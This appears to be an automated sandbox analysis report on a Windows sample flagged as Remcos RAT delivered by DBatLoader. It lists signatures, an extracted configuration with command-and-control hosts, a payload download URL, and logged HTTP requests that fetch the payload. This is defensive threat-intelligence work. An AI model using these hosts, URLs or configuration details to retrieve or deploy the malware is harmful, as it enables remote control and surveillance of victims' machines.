Windows Analysis Report
D2pQ4J4GGZ.exe

Overview

General Information

Sample name: D2pQ4J4GGZ.exe
(renamed because the original name is a hash value)
Original sample name: 0fca7f1081827c47d84ef12e4032db44a052539bd54c56394c610a672998f357.exe
Analysis ID: 1562869
MD5: 90c7bc4ce2d0f6eaadba08fac331f7b6
SHA1: 829acf583effec830edaed12ba8cda9c4bc1480f
SHA256: 0fca7f1081827c47d84ef12e4032db44a052539bd54c56394c610a672998f357
Tags: doganalecmdexeuser-JAMESWT_MHT

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Queues an APC in another process (thread injection)
Sigma detected: DLL Search Order Hijacking Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

AV Detection

Source: D2pQ4J4GGZ.exe Avira: detected
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Avira: detection malicious, Label: HEUR/AGEN.1325882
Source: D2pQ4J4GGZ.exe Malware Configuration Extractor: DBatLoader {"Download Url": ["https://bitbucket.org/ntim1478/gpmaw/downloads/250_Vjrsafyhidj"]}
Source: 0000000D.00000002.2349013309.000000001B1D7000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": ["idearo24.duckdns.org:2404:0", "morewins.duckdns.org:2500:0"], "Assigned name": "i-must-win", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-X0H4I6", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF ReversingLabs: Detection: 60%
Source: D2pQ4J4GGZ.exe ReversingLabs: Detection: 60%
Source: D2pQ4J4GGZ.exe Virustotal: Detection: 71%
Source: Yara match File source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2349013309.000000001B1D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2240779632.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4491250282.0000000000528000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027F38C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 8_2_027F38C8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027F38C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 11_2_027F38C8
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_028338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 13_2_028338C8
Source: D2pQ4J4GGZ.exe Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match File source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR

Privilege Escalation

Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027C7538 _wcslen,CoGetObject, 8_2_027C7538
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027C7538 _wcslen,CoGetObject, 11_2_027C7538
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_02807538 _wcslen,CoGetObject, 13_2_02807538
Source: D2pQ4J4GGZ.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 3.5.29.78:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: D2pQ4J4GGZ.exe, D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020717000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020700000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.00000000206D0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2031234000.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2123647740.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.4.dr
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000005.00000003.2129503162.0000000005620000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.5.dr
Source: Binary string: easinvoker.pdbH source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: D2pQ4J4GGZ.exe, 00000000.00000003.2032127390.000000000249D000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020717000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2130066315.000000002180D000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020700000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.00000000206D0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2031234000.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2130066315.000000002183E000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2149724742.00000000024A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: esentutl.exe, 00000004.00000003.2123647740.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.4.dr
Source: Binary string: ping.pdb source: esentutl.exe, 00000005.00000003.2129503162.0000000005620000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.5.dr
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029C5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_029C5908
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027C928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 8_2_027C928E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027DC322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 8_2_027DC322
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027CC388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 8_2_027CC388
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027C96A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 8_2_027C96A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027CBB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 8_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027D9B86 FindFirstFileW,FindNextFileW,FindNextFileW, 8_2_027D9B86
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027C7877 FindFirstFileW,FindNextFileW, 8_2_027C7877
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027C8847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 8_2_027C8847
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0280E8F9 FindFirstFileExA, 8_2_0280E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027CBD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 8_2_027CBD72
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027C928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 11_2_027C928E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027DC322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 11_2_027DC322
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027CC388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 11_2_027CC388
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027C96A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 11_2_027C96A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027CBB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 11_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027D9B86 FindFirstFileW,FindNextFileW,FindNextFileW, 11_2_027D9B86
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027C7877 FindFirstFileW,FindNextFileW, 11_2_027C7877
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027C8847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 11_2_027C8847
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0280E8F9 FindFirstFileExA, 11_2_0280E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027CBD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 11_2_027CBD72
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0280928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 13_2_0280928E
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0280C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 13_2_0280C388
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0281C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 13_2_0281C322
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_028096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 13_2_028096A0
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_02819B86 FindFirstFileW,FindNextFileW,FindNextFileW, 13_2_02819B86
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0280BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 13_2_0280BB6B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0284E8F9 FindFirstFileExA, 13_2_0284E8F9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_02808847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 13_2_02808847
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_02807877 FindFirstFileW,FindNextFileW, 13_2_02807877
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0280BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 13_2_0280BD72
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027C7CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 8_2_027C7CD2

Networking

Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49716 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49796 -> 192.169.69.26:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49745 -> 192.169.69.26:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49821 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49707 -> 192.169.69.26:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49769 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49900 -> 192.169.69.26:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49874 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49998 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49993 -> 192.169.69.26:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49994 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50000 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49991 -> 192.169.69.26:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49992 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49848 -> 192.169.69.26:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49997 -> 192.169.69.26:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49952 -> 192.169.69.26:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49995 -> 192.169.69.26:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49977 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49996 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49999 -> 192.169.69.26:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49925 -> 192.169.69.26:2500
Source: Malware configuration extractor URLs: https://bitbucket.org/ntim1478/gpmaw/downloads/250_Vjrsafyhidj
Source: Malware configuration extractor URLs: idearo24.duckdns.org
Source: Malware configuration extractor URLs: morewins.duckdns.org
Source: unknown DNS query: name: morewins.duckdns.org
Source: unknown DNS query: name: idearo24.duckdns.org
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029DE4B8 InternetCheckConnectionA, 0_2_029DE4B8
Source: Joe Sandbox View IP Address: 185.166.143.49
Source: Joe Sandbox View IP Address: 192.169.69.26
Source: Joe Sandbox View ASN Name: WOWUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 185.166.143.49:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 3.5.29.78:443
Source: global traffic HTTP traffic detected: GET /ntim1478/gpmaw/downloads/250_Vjrsafyhidj HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/0d838bb6-e11a-4581-89b6-9d1c81b740c6/250_Vjrsafyhidj?response-content-disposition=attachment%3B%20filename%3D%22250_Vjrsafyhidj%22&AWSAccessKeyId=ASIA6KOSE3BNJVZFSC5J&Signature=X9FPDBgOKbMRRHwdgtMpXClEkas%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEID%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDBsGro9ewLlxm1Jmlfi5RtGFKUidgU0v40nryUex%2FcIgIgI%2BrBcW%2F3yv43XRHYbOxWMP4rmh1qdoHeaiYCvGtj%2BUAqpwIIKBAAGgw5ODQ1MjUxMDExNDYiDKhoBvZz8dz3MdHLcyqEAqNX5Lbiey9VA4Nu2PKLpWe7AzQs30CYCQ17ojsFQBzWb9jeoj1R2lBiZuhmaGwyKFMZacVqoVxGu%2FNGxYiE5WD0T5%2FhYQC8Yx%2BpuwlCMYrdpZyr8LRd1Dspqx%2BDUimzDabcJHysCSHaxuL9Vias0chfJAV6mJYRKWIHNuFasT2CBnFQ1EmYqd%2FFNkaneV9mppb%2BaZ1xRVY6%2Bqv%2BcxJDSZrxDbYwJyM91nLC6Db5%2BAE7H9gjoWPlzs1RzlbZ9U6oQcsRra5iAMM5bKNk1DlWdmHiq0awQP3afEwfLFft8xhJw6j3%2Fs2HWvKLkfxj3x89YGzjHxLi0UqjQ3ffKLCPlhujaT27MMHplboGOp0BD9q41D6kLh9F0nVQM4xyf7fNq9CF0Ik0oCST0SE%2FeyLSoPqdarJpvPrLFVvqTmHs9Xrrnsn0b%2FWvuVqJdzvwFoysrGnC2guwi1wRx%2BRKdh6HIIzmhk1zI5aGT2YQWpP6qaOwQTzLKadxNdAhW0xo3LTCGGxx3cNyux56ve0aK891sK6sUoIojqjLnr9e3jrEAHd%2FC8rvFymkN3%2BxUg%3D%3D&Expires=1732606921 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027C4B96 WaitForSingleObject,SetEvent,recv, 8_2_027C4B96
Source: global traffic DNS traffic detected: DNS query: bitbucket.org
Source: global traffic DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: global traffic DNS traffic detected: DNS query: idearo24.duckdns.org
Source: global traffic DNS traffic detected: DNS query: morewins.duckdns.org
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
